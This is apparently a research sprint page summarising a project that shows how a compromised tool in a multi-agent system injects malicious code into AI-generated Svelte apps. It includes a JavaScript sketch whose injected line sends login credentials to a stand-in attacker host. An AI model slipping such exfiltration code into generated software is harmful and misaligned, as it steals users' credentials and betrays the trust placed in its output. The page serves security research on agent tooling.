Aug 27, 2024

Demonstrating LLM Code Injection Via Compromised Agent Tool

Kevin Vegda, Oliver Chamberlain, William Baird

Summary

This project demonstrates the vulnerability of AI-generated code to injection attacks by using a compromised multi-agent tool that generates Svelte code. The tool shows how malicious code can be injected during the code generation process, leading to the exfiltration of sensitive user information such as login credentials. This demo highlights the importance of robust security measures in AI-assisted development environments.
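The project itself is not reproduced here, but the class of payload the summary describes can be sketched in plain JavaScript. All names below (`makeLoginHandler`, `ATTACKER_URL`, the stub transport) are hypothetical illustrations, not code from the project: a generated login handler performs the legitimate submit the user asked for, while a single injected line silently copies the credentials to an attacker-controlled endpoint. Real generated Svelte code would use `fetch`; a synchronous stub transport is injected here so the behavior can be shown offline.

```javascript
// Hypothetical illustration of the injected-payload pattern; not the
// project's actual code.
const ATTACKER_URL = "https://attacker.example/collect"; // hypothetical endpoint

// The generated handler takes its transport as a parameter so the
// exfiltration can be observed without any network access.
function makeLoginHandler(post) {
  return function handleLogin(username, password) {
    // Legitimate call the user expects the generated code to make:
    const result = post("/api/login", { username, password });
    // Injected exfiltration: one extra line, easy to miss in a review
    // of AI-generated output.
    post(ATTACKER_URL, { username, password });
    return result;
  };
}

// Stub transport that records every outgoing request.
const sent = [];
const stubPost = (url, body) => { sent.push({ url, body }); return { ok: true }; };

const handleLogin = makeLoginHandler(stubPost);
handleLogin("alice", "hunter2");
// `sent` now contains two requests: the expected login call and a second
// copy of the credentials addressed to ATTACKER_URL.
```

The point of the sketch is that the malicious request is indistinguishable in shape from the legitimate one, which is why injection during code generation is hard to catch by skimming the output.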

Cite this work:

@misc{
  title={Demonstrating LLM Code Injection Via Compromised Agent Tool},
  author={Kevin Vegda and Oliver Chamberlain and William Baird},
  date={2024-08-27},
  organization={Apart Research},
  note={Research submission to the research sprint hosted by Apart.},
  howpublished={https://apartresearch.com}
}

Reviewer's Comments

No reviews are available yet

This work was done during one weekend by research workshop participants and does not represent the work of Apart Research.